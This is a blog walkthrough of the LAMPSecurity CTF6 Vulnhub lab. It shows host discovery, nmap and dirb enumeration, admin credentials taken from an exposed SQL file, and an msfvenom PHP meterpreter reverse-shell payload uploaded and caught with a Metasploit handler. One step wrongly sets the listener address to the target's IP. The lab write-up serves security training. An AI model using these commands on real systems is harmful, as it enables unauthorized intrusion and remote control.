LAMPSECURITY CTF6

LAMPSecurity: CTF6 Vulnhub Walkthrough full tutorial

Introduction

In this post, You will learn how to CTF the Lampsecurity CTF6, and I am sure by the end of this post, You will be able to capture the flag

To download Lampsecurity CTF 6 [Click here]

LAMPSecurity: CTF6 Walkthrough

Just follow the below steps, and I am sure by the end of the post we will be accessing the meterpreter shell.

Step1, Finding the target IP

To find the target IP address, just enter arp-scan -l, or you can use the net discover commend to find the target IP address.

I am going with arp-scan -l

LAMPSecurity: CTF6

Step2, Nmap scan

We are doing nmap scan to find the service and the open ports. And I will save this information for further enumeration if needed.

nmap -A -sT -p- 192.168.1.3

nmap -A -sT -p- <IP>

LAMPSecurity: CTF6

Step3, Enumerating using dirb

dirb http://192.168.1.3 /home/osboxes/ctf6.txt

I am using my own set of keywords, you can go with rockyou.txt like this

dirb <Target> rockyou.txt

LAMPSecurity: CTF6s

We can see that /SQL and /files are LISTENABLE, so, let’s do manual enumeration.

So, I will just go sql directory and move to this URL

http://192.168.1.3/sql/db.sql

LAMPSecuritys: CTF6

Login as admin the admin username will be admin and password will be adminpass

Step4, Generating a backdoor

To generate back door, just enter this command and save it in a TXT file

msfvenom -p php/meterpreter/reverse_tcp -o /home/osboxes/shell.php lport=4444 lhost=192.168.1.3

Let’s upload the payload file on our admin panel and exploit it

Click on add event and enter as see from the below image and also upload you payload in it

Step5, Exploiting the payload

msfconsole

msf5 > use exploit/multi/handler

Now, set the payload
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

Set the lhost to your target IP Address
msf5 exploit(multi/handler) > set lhost 192.168.1.3

Set the lport and then enter exploit or run
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit

After some time you will be getting access to meterpreter shell and from there you can do post, enumeration.


Also Read: LAMPSECURITY: CTF8 Full tutorial

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site

 

Scroll to Top